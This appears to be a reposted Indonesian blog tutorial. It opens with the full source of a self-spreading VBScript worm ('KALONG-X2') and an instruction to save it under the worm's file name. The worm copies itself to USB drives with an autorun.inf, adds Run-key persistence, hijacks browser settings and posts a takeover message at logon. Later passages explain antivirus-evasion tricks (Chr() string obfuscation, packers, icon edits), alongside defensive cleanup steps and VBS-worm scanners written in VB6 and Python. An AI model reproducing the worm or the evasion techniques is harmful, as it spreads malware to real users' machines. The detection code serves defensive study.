on error resume next

'Declare the following variables
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd

'prepare the autorun contents
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.sys.vbs"
set longka = createobject("Scripting.FileSystemObject")
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'create the parent file
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 39

'spread to removable disks together with Autorun.inf
for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then

set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes =32
set tf=longka.createtextfile(desades.path &"\k4l0n6.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes = 39

set tf =longka.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next

'Registry manipulation
set kalong = createobject("WScript.Shell")

'Change the IE title
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"

'Change the first entry in the RUN menu text box
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"

'Create a message at Windows startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"
kalong.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"

'Activate at Windows startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"

'Change Internet Explorer's default start page
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com"

'Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

save that code under the file name and extension "k4l0n6.sys.vbs" (without the quotes)

the virus will then spread automatically through flash disks and infect the computer we use. To tell whether a computer has been hit by an autorun virus, you can use the iKnowPS software, which will show the computer's activity looking very busy.

The virus is dealt with as follows

- open the menu Tools > Folder Options… > View > uncheck Hide protected operating system files (Recommended) > Yes > OK

- the hidden virus files will then become visible automatically

- the next step is to open and study the virus file's script, and to work out which parts of the settings it changes, especially in Registry Editor (Run menu > type regedit > OK)

- after that, delete the file from the computer
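The third step above, working out which settings the script changed, is easier with a checklist than by reading the registry by hand. As an added example (not from the original post), here is a small triage helper in Python: assess_autorun() reads an autorun.inf and says what it would launch, and check_registry() takes a snapshot of registry values (a plain dict, as a scan would collect them) and flags the kinds of changes the sample script above makes: a Run entry pointing at a script file, a logon notice, an overridden IE window title. snapshot_windows() fills that dict from the live registry on a Windows host. The function names, the indicator lists and the constructed sample values are this example's own; it assumes the reader has permission to open the keys named.

```python
"""Triage helper for the autorun cleanup steps (added example, not from the post).

assess_autorun(): what an autorun.inf would launch, and why that is suspicious.
check_registry(): flags the kinds of registry changes the post's script makes,
given a snapshot dict {key_path: {value_name: data}}.
snapshot_windows(): builds that dict from the live registry (Windows only).
"""
import sys

# Constructed sample: the autorun.inf shown in the post.
SAMPLE_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe k4l0n6.sys.vbs\r\n"

SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "cmd", "rundll32")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd")
AUTORUN_COMMAND_KEYS = ("open", "shellexecute", "shell\\open\\command")

# Keys the post's script writes to; these form the checklist.
RUN_KEYS = (
    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
)
WINLOGON_KEY = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon"
IE_MAIN_KEY = "HKCU\\Software\\Microsoft\\Internet Explorer\\Main"


def script_indicators(cmd: str) -> list:
    """Reasons a command line looks like it runs a script (empty = nothing seen)."""
    tokens = cmd.replace('"', "").split()  # quotes ignored: good enough for triage
    if not tokens:
        return []
    reasons = []
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    if exe.rsplit(".", 1)[0] in SCRIPT_HOSTS:
        reasons.append("launches script host " + exe)
    for tok in tokens:
        name = tok.rsplit("\\", 1)[-1].lower()
        if name.endswith(SCRIPT_EXTS):
            reasons.append("runs script file " + name)
            if name.count(".") >= 2:
                reasons.append("double extension " + name)
    return reasons


def parse_autorun(text: str) -> dict:
    """key=value pairs of the [autorun] section, keys lower-cased."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def assess_autorun(text: str) -> list:
    entries = parse_autorun(text)
    reasons = []
    for key in AUTORUN_COMMAND_KEYS:
        if key in entries:
            reasons += [key + ": " + r for r in script_indicators(entries[key])]
    return reasons


def check_registry(snapshot: dict) -> list:
    """Returns (key_path, value_name, why) for each value worth reviewing."""
    findings = []
    for key in RUN_KEYS:
        for name, data in snapshot.get(key, {}).items():
            for why in script_indicators(str(data)):
                findings.append((key, name, why))
    for name in ("LegalNoticeCaption", "LegalNoticeText"):
        if snapshot.get(WINLOGON_KEY, {}).get(name):
            findings.append((WINLOGON_KEY, name, "logon notice is set"))
    if snapshot.get(IE_MAIN_KEY, {}).get("Window Title"):
        findings.append((IE_MAIN_KEY, "Window Title", "IE window title overridden"))
    return findings


def snapshot_windows() -> dict:
    import winreg  # only available on Windows
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snapshot = {}
    for path in RUN_KEYS + (WINLOGON_KEY, IE_MAIN_KEY):
        hive, _, sub = path.partition("\\")
        values, index = {}, 0
        try:
            with winreg.OpenKey(hives[hive], sub) as key:
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, index)
                    except OSError:  # no more values
                        break
                    values[name] = data
                    index += 1
        except OSError:  # key absent or not readable
            continue
        snapshot[path] = values
    return snapshot


if __name__ == "__main__":
    print(assess_autorun(SAMPLE_AUTORUN))
    if sys.platform == "win32":
        for finding in check_registry(snapshot_windows()):
            print(finding)
```

Run it from a drive you trust, not from the removable disk under suspicion; a Run entry that points at a .vbs in the system directory is the thing to remove before rebooting, otherwise the file you deleted is simply written back at the next logon.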

hopefully this write-up is useful and helpful to everyone.



source: 7up3r1

Jasakom

MiztaPEE


Heuristic Techniques in Antivirus Software


A heuristic technique is what an antivirus uses to detect new viruses, or ones not yet in its signature database. How? Each antivirus of course has its own way. Take as an example (local ones only, OK..) Ansav +E Advanced 1.7.8 (don't know whether there is a newer version); this AV carries the "Advanced Ansav Heuristic Engine". With AAHE, Ansav detects a file as a threat by comparing a signature against the entry point/PE header in the file body. Roughly like that. PCMAV rc23, on the other hand, relies for its heuristic on checking whether a file carries the signature of a particular icon. That is, if we build a program that contains a folder icon (either as the file icon or as a resource), PCMAV will treat the file as a threat.


However, those heuristic techniques can be bypassed easily (heuristic bypassing); with Ansav, for example, we can use packers that are not in Ansav's heuristic "database". With PCMAV, well.. the simplest thing is just not to use the icons it regards as threats (folder, Word icons, etc.) or to change the icon body structure with a hex editor (but take care that the icon image doesn't change).

On this occasion I will discuss a heuristic technique for detecting VBS worms. This came from curiosity about PCMAV, which always guesses VBS worms accurately. The story: a friend asked me to clean a virus, and it turned out to be detected as a worm by a foreign antivirus on my PC; curious to test the strength of that antivirus, I tried encrypting the worm, where the text "Scripting.FileSystemObject" I encrypted into Chr(83) + Chr(99) + Chr(114) + Chr(105) + Chr(112) + Chr(116) + Chr(105) + Chr(110) + Chr(103) + Chr(46) + Chr(70) + Chr(105) + Chr(108) + Chr(101) + Chr(83) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116)

Tadaaa... it turned out my antivirus could not detect it... Then I remembered PCMAV (I had read on its official site that PCMAV has an advanced heuristic for detecting VBS files). Scanned with PCMAV, it was detected. Fine, I encrypted every string. Ehhh, still detected... impressive... this antivirus has a paranoid heuristic. After studying it for almost a thousand seconds, it turned out that PCMAV's heuristic detects a few pieces of text that a worm cannot avoid using, one of them the combination of the commands "CreateObject" and "wscript.scriptfullname". How would you encrypt that text?? because this kind of text is not a string but an internal VBS command. In Delphi, commands can perhaps be encrypted, but probably only commands that use the API, such as "UrlDownloadToFile", which is called from urlmon.dll. Just play with memory (GetProcAddress).

But I will not discuss how to do heuristic bypassing; can't be bothered, because if there are lots of sophisticated viruses, then when a girl asks me to clean her PC and I can't... you know how it goes... OK.. moving on, we will build a basic program to detect VBS worms.

What we need is VB6 and:
Components and their names

TextBox : Text1

CommandButton : Command1
CommandButton : Command2
CommonDialog : CommonDialog1

In Command1 put:

CommonDialog1.Filter = "VBS File (*.vbs)|*.VBS"
CommonDialog1.ShowOpen
If CommonDialog1.FileName = "" Then Exit Sub
Text1.Text = CommonDialog1.FileName

In Command2 put:

Vbs_Checker Text1.Text

Then create the following function:


Public Function Vbs_Checker(ByVal target As String)
    Dim maltext As String

    If target = "" Then Exit Function
    If Dir$(target) = "" Then Exit Function

    On Error Resume Next

    Open target For Input As #1
    While EOF(1) = False
        DoEvents

        Line Input #1, maltext
        ' Prefix a space and lower-case the line, so every pattern below
        ' must be written in lower case to match.
        maltext = " " & maltext
        maltext = LCase(maltext)

        If InStr(maltext, "createobject") > 0 Then GoSub warning
        If InStr(maltext, "regwrite") > 0 Then GoSub warning
        If InStr(maltext, "wscript.scriptfullname") > 0 Then GoSub warning
        ' This pattern was mixed-case in the original and could never match a lower-cased line.
        If InStr(maltext, "activedocument.shapes.addoleobject") > 0 Then GoSub warning

    Wend
    Close #1   ' release the handle, otherwise the next scan cannot open #1

    Exit Function

warning:
    MsgBox "Suspected command : " & maltext, vbExclamation, "Warning"
    Return
End Function


The code above should be self-explanatory, but I'll explain it again for beginners like me. The core of the program is that it reads the VBS file we chose and compares the file's contents against certain text, for example "createobject". If that text is found, a warning appears.

Once again, the code above is only a concept for detecting VBS worms. It would probably be better to compare more than one word, to avoid false alarms.
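The same idea carried a step further, as an added example in Python (not code from the post, from PCMAV or from Ansav): Chr(n) & Chr(n) concatenations are decoded back into the string they build before matching, so the "Scripting.FileSystemObject" trick from the story above is undone, and several indicators are scored together instead of alerting on the first hit, which is how the false alarms the author mentions are kept down. The indicator weights, the alert threshold, the function names and the two constructed sample scripts are this example's own choices.

```python
"""Heuristic VBS scanner (added example, not from the post, PCMAV or Ansav).

Decodes Chr(n) & Chr(n) runs before matching and scores several
indicators together instead of alerting on the first hit.
"""
import re
import sys

# (pattern, weight); lower-case, because the text is lower-cased before matching.
INDICATORS = [
    ("createobject", 1),
    ("scripting.filesystemobject", 1),
    ("on error resume next", 1),
    (".attributes", 1),
    ("regwrite", 2),
    ("wscript.scriptfullname", 3),   # a script reading its own file: replication sign
    ("autorun.inf", 3),
    ("activedocument.shapes.addoleobject", 3),
]
ALERT_THRESHOLD = 5   # this example's choice: two weak hits alone never alert

CHR_CALL = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.I)
# Runs of Chr() joined by & or +, i.e. a string literal being rebuilt piecewise.
CHR_RUN = re.compile(r"(?:chr\(\s*\d{1,3}\s*\)\s*[&+]\s*)+chr\(\s*\d{1,3}\s*\)", re.I)


def decode_chr_runs(text: str) -> str:
    """Replace every Chr() concatenation with the quoted string it builds."""
    def rebuild(match):
        chars = "".join(chr(int(n)) for n in CHR_CALL.findall(match.group(0)))
        return '"' + chars + '"'
    return CHR_RUN.sub(rebuild, text)


def scan_vbs(text: str) -> dict:
    """Score one script's text; 'alert' is the combined verdict."""
    decoded = decode_chr_runs(text)
    lowered = decoded.lower()
    hits = [(p, w) for p, w in INDICATORS if p in lowered]
    score = sum(w for _, w in hits)
    return {
        "score": score,
        "hits": [p for p, _ in hits],
        "alert": score >= ALERT_THRESHOLD,
        "chr_obfuscation": decoded != text,
    }


def scan_file(path: str) -> dict:
    with open(path, encoding="latin-1") as fh:
        return scan_vbs(fh.read())


def chr_encode(s: str) -> str:
    """Builds the Chr(..) & Chr(..) form shown in the post; used only for the sample."""
    return " & ".join("Chr(%d)" % ord(c) for c in s)


# Constructed samples: a harmless file reader, and a non-functional
# fragment carrying the indicators a replicating script shows.
BENIGN = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'Set f = fso.OpenTextFile("C:\\logs\\today.txt", 1)\n'
    "WScript.Echo f.ReadAll\n"
)
SUSPICIOUS = (
    "on error resume next\n"
    "set fso = createobject(" + chr_encode("Scripting.FileSystemObject") + ")\n"
    "set mf = fso.getfile(wscript.scriptfullname)\n"
    'set tf = fso.createtextfile(d & "\\autorun.inf")\n'
)

if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, scan_file(path))
    print("benign    ", scan_vbs(BENIGN))
    print("suspicious", scan_vbs(SUSPICIOUS))
```

The benign sample scores 2 (it uses CreateObject and the FileSystemObject like countless admin scripts) and stays below the threshold; the suspicious fragment scores 9 and is also flagged for Chr() obfuscation, which is itself worth reporting since a legitimate script rarely spells out a class name character by character.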

That's all (sounds like closing a speech); hopefully it is of some use to whoever reads it.


Original Text by Fajar :: anggiawan.web.id


Republished by MiztaPEE
